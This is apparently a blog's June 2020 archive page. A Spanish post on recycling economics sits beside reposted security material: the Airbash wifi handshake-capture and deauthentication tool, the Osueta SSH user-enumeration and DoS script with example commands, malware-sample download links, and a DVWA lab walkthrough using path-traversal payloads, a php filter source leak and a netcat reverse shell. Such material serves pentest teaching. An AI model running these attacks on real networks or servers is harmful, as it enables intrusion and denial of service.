diaphram: June 2020

Tuesday, June 30, 2020

Un Día De Reciclador: Cuando El Diseño No Resuelve

Es aterradora la cantidad de basura que arrojamos a botaderos mal gestionados cuando no a ríos o mares. El reciclaje es una absoluta necesidad y los recicladores, héroes urbanos nos ayudan a recuperar buena parte de lo que para nosotros es basura

El tema me obsesiona, estoy tratando de minimizar al mínimo los desechos de mi casa. En una finca es fácil pues todo lo orgánico se vuelve compost y hay espacio para ir clasificando lo reciclable.

Como en las vecindades no pasa el reciclador, apenas el camión de la basura, entregarle a estos héroes urbanos el material que se puede reciclar no es una opción, por ello en cuanto el montonero de plásticos, cartones y vidrios superó los límites de la decencia, llené mi vetusto Chevrolet Sprint con seis meses de desechos y me fui con estos a la bodega de reciclaje no muy lejos de mi casa.

En esta corta nota les cuento lo que aprendí:

El resultado de varios meses de reciclaje listo para salir su valor $22.000

Al llegar al lugar hice la fila detrás de dos recicladores con los cuales me puse a conversar. Ellos en sus recorridos hacen entre 30 y 40 mil pesos diarios, En Chía se han organizado en una cooperativa y se reparten territorios. El crecimiento desordenado del municipio y la construcción de conjuntos y edificios los ha beneficiado pues en estos lugares ya recogen una buena cantidad de material clasificado sin tener que movilizarse demasiado.

Los precios que pagan por los materiales son muy bajos y oscilan dependiendo de oferta y demanda. Lo más rentable es la chatarra siendo la mejor la de aluminio, el cartón y lo que llaman "archivo" que corresponde a revistas y papeles de buena calidad. Me sorprendió lo poco que pagan por el vidrio, $100 por kilo y por el plástico derivado de envases.

Mi pequeño Sprint a reventar, "rindió" $22.000 entre botellas, cartones y periódicos. Mi "colega" Don Gregorio que venía adelante en carro de pedal, seguramente hizo menos.

El problema también tiene que ver con el volumen. Como el plástico principalmente se recoge en botellas de líquidos e insumos para el hogar, la relación de volumen vs peso, es perjudicial para el reciclador que a pesar de prensar las botellas e implementos PET, lleva mucho volumen con poco valor.
Mi viaje con los desperdicios del reciclaje me dio un retorno de $22.000 cerca de us $7 con los que posteriormente hice el mercado de frutas de estación para la semana.

El problema en mayor volumen también lo es para la bodega de reciclaje cuyas caoticas torres de desperdicios ocupan mucho espacio. No son bien vistos por vecinos, suelen tener problemas por uso de suelos. El negocio seguramente está en el transformador que es quien pica y funde estos materiales para su reutilización posterior.

Momento de pago. Mi pequeño vehiculo, mayor que todos los vehiculos a pedal de mis "colegas", me dejó $22.000

Al final mi ejercicio, que tenía como finalidad entender el problema desde la comercialización para pensar en algunas hipótesis de proyectos de diseño, fue estéril. Más interesantes las reflexiones mientras hacía la fila detrás de dos minúsculos carros de pedal conversando con personas que habían dedicado toda la mañana para recoger quizás una suma inferior a la que gané con mi ejercicio.

He visto muchos proyectos universitarios de diseño proponiendo carritos para recicladores. Ese no es el problema. si estos héroes pudieran llevar su material ya previamente compactado aunque fuera manera artesanal para poder cargar más peso, tampoco obtendrían grandes ventajas. Si no hemos sido capaces de lograr que la gente separe los detritos en útiles e inútiles, mucho menos vamos a lograr que salga compactado de edificios y conjuntos.
Es necesaria una articulación y son varios los actores: Los ciudadanos, especialmente en conjuntos y edificios. Los recicladores que para ser eficientes deben estar organizados y la administración municipal que debe organizarlos por sectores geográficos y puntos de entrega.

Así como existe un " sistema de transporte" , debe existir un "sistema de reciclaje" y eso con sus más o sus menos ya existe en muchos municipios. En el mio los recicladores cuentan con uniforme y zapatos así como un apoyo para el funcionamiento de su cooperativa y gestión de rutas cortas en recorrido pero favorables en volumen recogido.

El problema del reciclaje tiene entonces varias escalas y se establece dentro de varios parámetros y responsables:

1- Conciencia social empresarial, especialmente sobre el uso desmedido del plástico. Es indispensable volver a experiencias exitosas en el pasado como los envases retornables en canasta que para llevarlos a la casa, teníamos que dejar " la finca" es decir un depósito que se hacía efectivo al devolverlo. No debemos comprar empaques para desechar. Urge una reglamentación estricta en este sentido para cobrarle al empresario por su basura.

1-1. Cuando los empaques no sean retornables, deben ser "colapsables" de modo que no ocupen tanto espacio en el reciclaje o que puedan tener un segundo uso, recuerdo los frascos de mermelada que posteriormente servían de vasos en la casa, Empaques ultralivianos y con poco material no parecen ser una idea muy buena, pues no van a tener valor en el mercado de reciclaje y van a acabar en el basurero o contaminando mares o ríos.

2- Empaque:
En su cara vendedora del producto, se convirtió en valla publicitaria de si mismo. Organizar en el mismo espacio de góndola un sistema de venta a granel, por peso o unidades desde un dispensador, no solo puede ser publicitariamente más eficiente, como definitivamente más sostenible.

3- El carro de mercado debe ser rediseñado para evitar las bolsas plásticas, las abuelas llevaban su canasto. Este concepto que funcionó por generaciones, se debe retomar en artilugios mejor pensados por supuesto, si la medida de precio es el peso, no la unidad y la canasta de compra tiene bolsillos retirable

4- Suministro: Ante el auge de los servicios de entrega a domicilio, se justifica tener empaques ineficientes y costosos? Como se puede pensar un suministro eficiente sin basura incorporada

En este caso, el problema no es de diseño, es de comportamiento, empatía y conciencia empresarial y ambiental.

Al final diseñadores: es muy poquito lo que podemos hacer. Yo por lo menos ya puedo llamar a Don Gonzalo, el reciclador para que dentro de seis meses se gane sus $22.000 por dos horas de trabajo y no un día de recorrido.

More information

Top 8 Hacker Blog list for Hackers 2018

Hacked Gadgets: A resource for DIY project documentation as well as general gadget and technology news.
Phrack Magazine: Digital hacking magazine.
KitPloit: Leading source of Security Tools, Hacking Tools, CyberSecurity and Network Security.
The Hacker News: The Hacker News — most trusted and widely-acknowledged online cyber security news magazine with in-depth technical coverage for cybersecurity.
Metasploit: Find security issues, verify vulnerability mitigations & manage security assessments with Metasploit. Get the worlds best penetration testing software now.
HackRead: HackRead is a News Platform that centers on InfoSec, Cyber Crime, Privacy, Surveillance, and Hacking News with full-scale reviews on Social Media Platforms.
Packet Storm: Information Security Services, News, Files, Tools, Exploits, Advisories and Whitepapers.
Exploit DB: An archive of exploits and vulnerable software by Offensive Security. The site collects exploits from submissions and mailing lists and concentrates them in a single database.

Thursday, June 11, 2020

Airba.sh - A POSIX-compliant, Fully Automated WPA PSK Handshake Capture Script Aimed At Penetration Testing

Airbash is a POSIX-compliant, fully automated WPA PSK handshake capture script aimed at penetration testing. It is compatible with Bash and Android Shell (tested on Kali Linux and Cyanogenmod 10.2) and uses aircrack-ng to scan for clients that are currently connected to access points (AP). Those clients are then deauthenticated in order to capture the handshake when attempting to reconnect to the AP. Verification of a captured handshake is done using aircrack-ng. If one or more handshakes are captured, they are entered into an SQLite3 database, along with the time of capture and current GPS data (if properly configured).

After capture, the database can be tested for vulnerable router models using crackdefault.sh. It will search for entries that match the implemented modules, which currently include algorithms to compute default keys for Speedport 500-700 series, Thomson/SpeedTouch and UPC 7 digits (UPC1234567) routers.

Requirements
WiFi interface in monitor mode aircrack-ng SQLite3 openssl for compilation of modules (optional) wlanhc2hcx from hcxtools
In order to log GPS coordinates of handshakes, configure your coordinate logging software to log to .loc/*.txt (the filename can be chosen as desired). Airbash will always use the output of cat "$path$loc"*.txt 2>/dev/null | awk 'NR==0; END{print}', which equals to reading all .txt files in .loc/ and picking the second line. The reason for this way of implementation is the functionality of GPSLogger, which was used on the development device.

Calculating default keys
After capturing a new handshake, the database can be queried for vulnerable router models. If a module applies, the default keys for this router series are calculated and used as input for aircrack-ng to try and recover the passphrase.

Compiling Modules
The modules for calculating Thomson/SpeedTouch and UPC1234567 (7 random digits) default keys are included in src/
Credits for the code go to the authors Kevin Devine and [peter@haxx.in].

On Linux:
gcc -fomit-frame-pointer -O3 -funroll-all-loops -o modules/st modules/stkeys.c -lcrypto
gcc -O2 -o modules/upckeys modules/upc_keys.c -lcrypto

If on Android, you may need to copy the binaries to /system/xbin/ or to another directory where binary execution is allowed.

Usage
Running install.sh will create the database, prepare the folder structure and create shortlinks to both scripts which can be moved to a directory that is on $PATH to allow execution from any location.
After installation, you may need to manually adjust INTERFACE on line 46 in airba.sh. This will later be determined automatically, but for now the default is set to wlan0, to allow out of the box compatibility with bcmon on Android.
./airba.sh starts the script, automatically scanning and attacking targets that are not found in the database. ./crackdefault.sh attempts to break known default key algorithms.
To view the database contents, run sqlite3 .db.sqlite3 "SELECT * FROM hs" in the main directory.

Update (Linux only ... for now):
Airbash can be updated by executing update.sh. This will clone the master branch into /tmp/ and overwrite the local files.

Output
_n: number of access points found
__c/m: represents client number and maximum number of clients found, respectively
-: access point is blacklisted
x: access point already in database
?: access point out of range (not visible to airodump anymore)

The Database
The database contains a table called hs with seven columns.
id: incrementing counter of table entries
lat and lon: GPS coordinates of the handshake (if available)
bssid: MAC address of the access point
essid: Name identifier
psk: WPA Passphrase, if known
prcsd: Flag that gets set by crackdefault.sh to prevent duplicate calculation of default keys if a custom passphrase was used.
Currently, the SQLite3 database is not password-protected.

Download Airbash

Ask And You Shall Receive

I get emails from readers asking for specific malware samples and thought I would make a mini post about it.

Yes, I often obtain samples from various sources for my own research.

I am sometimes too lazy/busy to post them but don't mind sharing.
If you are looking for a particular sample, feel free to ask. I might have it.

Send MD5 (several or few samples). I cannot provide hundreds/thousands of samples or any kind of feeds. If you ask for a particular family, I might be able to help if I already have it.

Unfortunately, I do not have time to do homework for students and provide very specific sets for malware with specific features as well as guarantee the C2s are still active. Send your MD5(s) or at least malware family and I check if I have it :) If i have it, I will either send you or will post on the blog where you can download.

If you emailed me in the past and never got an answer, please remind me. Sometimes emails are long with many questions and I flag them to reply to later, when I have time and they get buried or I forget. It does not happen very often but accept my apologies if it happened to you.

Before you ask, check if it is already available via Contagio or Contagio Mobile.
1. Search the blog using the search box on the right side
2. Search here https://www.mediafire.com/folder/b8xxm22zrrqm4/BADINFECT
3. Search here https://www.mediafire.com/folder/c2az029ch6cke/TRAFFIC_PATTERNS_COLLECTION
4. Search here https://www.mediafire.com/folder/78npy8h7h0g9y/MOBILEMALWARE

Cheers, Mila

Wednesday, June 10, 2020

OWASP ZAP RELEASES V2.8.0 WITH THE HEADS UP DISPLAY

OWASP ZAP RELEASES V2.8.0 WITH THE HEADS UP DISPLAY
Heads Up Display simplifies and improves vulnerability testing for developers

London, England, 20 June 2019. OWASP™ ZAP (Open Web Application Security Project™ Zed Attack Proxy) has released a new version of its leading ZAP Project which now includes an innovative Heads Up Display (HUD) bringing security information and functionality right into the browser. Now software developers can interactively test the reliability and security of their applications in real time while controlling a wide variety of features designed to test the quality of their software.

ZAP is a free, easy to use integrated penetration testing tool. With the addition of the Heads Up Display, ZAP can be used by security professionals and developers of all skill levels to quickly and more easily find security vulnerabilities in their applications. Given the unique and integrated design of the Heads Up Display, developers and functional testers who might be new to security testing will find ZAP an indispensable tool to build secure software.

The latest version of ZAP can be downloaded from https://www.owasp.org/index.php/ZAP The full release notes are available at https://github.com/zaproxy/zap-core-help/wiki/HelpReleases2_8_0.

In addition to being the most popular free and open source security tools available, ZAP is also one of the most active with hundreds of volunteers around the globe continually improving and enhancing its features. ZAP provides automated scanners as well as a set of tools that allows new users and security professionals to manually identify security vulnerabilities. ZAP has also been translated into over 25 languages including French, Italian, Dutch, Turkish and Chinese.

Simon Bennetts, OWASP ZAP Project Leader commented: "This is a really important release for the project team and developers who want to build great and secure applications. The HUD is a completely new interface for ZAP and one that is unique in the industry. It shows that open source projects continue to create high-quality, new and exciting tools that deliver real value to the market - and at no cost to users."

"ZAP is the Foundation's most popular software tool," said Mike McCamon interim executive director of the OWASP Foundation. McCamon continued, "For nearly two decades OWASP continues to be a great destination for innovators to host, develop, and release software that will secure the web. Simon and the entire ZAP community deserves great recognition for their continued devotion to open source excellence."

For further information please contact:
Simon Bennetts, OWASP ZAP Project Leader: simon.bennetts@owasp.org or Mike McCamon, Interim Executive Director, mike.mccamon@owasp.comContinue reading

Osueta: A Simple Python Script To Exploit The OpenSSH User Enumeration Timing Attack

About Osueta?
Osueta it's a simple Python 2 script to exploit the OpenSSH User Enumeration Timing Attack, present in OpenSSH versions <= 7.2 and >= 5.*. The script has the ability to make variations of the username employed in the bruteforce attack, and the possibility to establish a DoS condition in the OpenSSH server.

Read more: OpenSSH User Enumeration Time-Based Attack

The bug was corrected in OpenSSH version 7.3.

Authors of Osueta:

c0r3dump3d: coredump@autistici.org
rofen: rofen@gmx.de

Osueta's Installation
For Linux users, open your Terminal and enter these commands:
If you're Windows users, follow these steps:

Install Python 2.7.x from Python.org first. On Install Python 2.7.x Setup, choose Add python.exe to Path.
Download Osueta-master zip file.
Then unzip it.
Open CMD or PowerShell window at the Osueta folder you have just unzipped and enter these commands:
pip install python-nmap paramiko IPy
python osueta.py -h

Advice: Like others offensive tools, the authors disclaims all responsibility in the use of this script.

Osueta help menu:

Osueta's examples:
A single user enumeration attempt with username variations:
python2 osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v yes

A single user enumeration attempt with no user variations a DoS attack:
python2 osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v no --dos yes

Scanning a C class network with only one user:
python2 osueta.py -H 192.168.1.0/24 -p 22 -U root -v no

Scanning a C class network with usernames from a file, delay time 15 seconds and a password of 50000 characters:
python2 osueta.py -H 192.168.1.0/24 -p 22 -L usernames.txt -v yes -d 15 -l 50

Download Osueta

Related word

Tuesday, June 9, 2020

Learning Web Pentesting With DVWA Part 6: File Inclusion

In this article we are going to go through File Inclusion Vulnerability. Wikipedia defines File Inclusion Vulnerability as: "A file inclusion vulnerability is a type of web vulnerability that is most commonly found to affect web applications that rely on a scripting run time. This issue is caused when an application builds a path to executable code using an attacker-controlled variable in a way that allows the attacker to control which file is executed at run time. A file include vulnerability is distinct from a generic directory traversal attack, in that directory traversal is a way of gaining unauthorized file system access, and a file inclusion vulnerability subverts how an application loads code for execution. Successful exploitation of a file inclusion vulnerability will result in remote code execution on the web server that runs the affected web application."
There are two types of File Inclusion Vulnerabilities, LFI (Local File Inclusion) and RFI (Remote File Inclusion). Offensive Security's Metasploit Unleashed guide describes LFI and RFI as:
"LFI vulnerabilities allow an attacker to read (and sometimes execute) files on the victim machine. This can be very dangerous because if the web server is misconfigured and running with high privileges, the attacker may gain access to sensitive information. If the attacker is able to place code on the web server through other means, then they may be able to execute arbitrary commands.
RFI vulnerabilities are easier to exploit but less common. Instead of accessing a file on the local machine, the attacker is able to execute code hosted on their own machine."
In simpler terms LFI allows us to use the web application's execution engine (say php) to execute local files on the web server and RFI allows us to execute remote files, within the context of the target web server, which can be hosted anywhere remotely (given they can be accessed from the network on which web server is running).
To follow along, click on the File Inclusion navigation link of DVWA, you should see a page like this:

Lets start by doing an LFI attack on the web application.
Looking at the URL of the web application we can see a parameter named page which is used to load different php pages on the website.

http://localhost:9000/vulnerabilities/fi/?page=include.php

Since it is loading different pages we can guess that it is loading local pages from the server and executing them. Lets try to get the famous /etc/passwd file found on every linux, to do that we have to find a way to access it via our LFI. We will start with this:

../etc/passwd

entering the above payload in the page parameter of the URL:

http://localhost:9000/vulnerabilities/fi/?page=../etc/passwd

we get nothing back which means the page does not exist. Lets try to understand what we are trying to accomplish. We are asking for a file named passwd in a directory named etc which is one directory up from our current working directory. The etc directory lies at the root (/) of a linux file system. We tried to guess that we are in a directory (say www) which also lies at the root of the file system, that's why we tried to go up by one directory and then move to the etc directory which contains the passwd file. Our next guess will be that maybe we are two directories deeper, so we modify our payload to be like this:

../../etc/passwd

we get nothing back. We continue to modify our payload thinking we are one more directory deeper.

../../../etc/passwd

no luck again, lets try one more:

../../../../etc/passwd

nop nothing, we keep on going one directory deeper until we get seven directories deep and our payload becomes:

../../../../../../../etc/passwd

which returns the contents of passwd file as seen below:

This just means that we are currently working in a directory which is seven levels deep inside the root (/) directory. It also proves that our LFI is a success. We can also use php filters to get more and more information from the server. For example if we want to get the source code of the web server we can use php wrapper filter for that like this:

php://filter/convert.base64-encode/resource=index.php

We will get a base64 encoded string. Lets copy that base64 encoded string in a file and save it as index.php.b64 (name can be anything) and then decode it like this:

cat index.php.b64 | base64 -d > index.php

We will now be able to read the web application's source code. But you maybe thinking why didn't we simply try to get index.php file without using php filter. The reason is because if we try to get a php file with LFI, the php file will be executed by the php interpreter rather than displayed as a text file. As a workaround we first encode it as base64 which the interpreter won't interpret since it is not php and thus will display the text. Next we will try to get a shell. Before php version 5.2, allow_url_include setting was enabled by default however after version 5.2 it was disabled by default. Since the version of php on which our dvwa app is running on is 5.2+ we cannot use the older methods like input wrapper or RFI to get shell on dvwa unless we change the default settings (which I won't). We will use the file upload functionality to get shell. We will upload a reverse shell using the file upload functionality and then access that uploaded reverse shell via LFI.
Lets upload our reverse shell via File Upload functionality and then set up our netcat listener to listen for a connection coming from the server.

nc -lvnp 9999

Then using our LFI we will execute the uploaded reverse shell by accessing it using this url:

http://localhost:9000/vulnerabilities/fi/?page=../../hackable/uploads/revshell.php

Voila! We have a shell.

To learn more about File Upload Vulnerability and the reverse shell we have used here read Learning Web Pentesting With DVWA Part 5: Using File Upload to Get Shell. Attackers usually chain multiple vulnerabilities to get as much access as they can. This is a simple example of how multiple vulnerabilities (Unrestricted File Upload + LFI) can be used to scale up attacks. If you are interested in learning more about php wrappers then LFI CheetSheet is a good read and if you want to perform these attacks on the dvwa, then you'll have to enable allow_url_include setting by logging in to the dvwa server. That's it for today have fun.
Leave your questions and queries in the comments below.

References:

FILE INCLUSION VULNERABILITIES: https://www.offensive-security.com/metasploit-unleashed/file-inclusion-vulnerabilities/
php://: https://www.php.net/manual/en/wrappers.php.php
LFI Cheat Sheet: https://highon.coffee/blog/lfi-cheat-sheet/
File inclusion vulnerability: https://en.wikipedia.org/wiki/File_inclusion_vulnerability
PHP 5.2.0 Release Announcement: https://www.php.net/releases/5_2_0.php

Read more

diaphram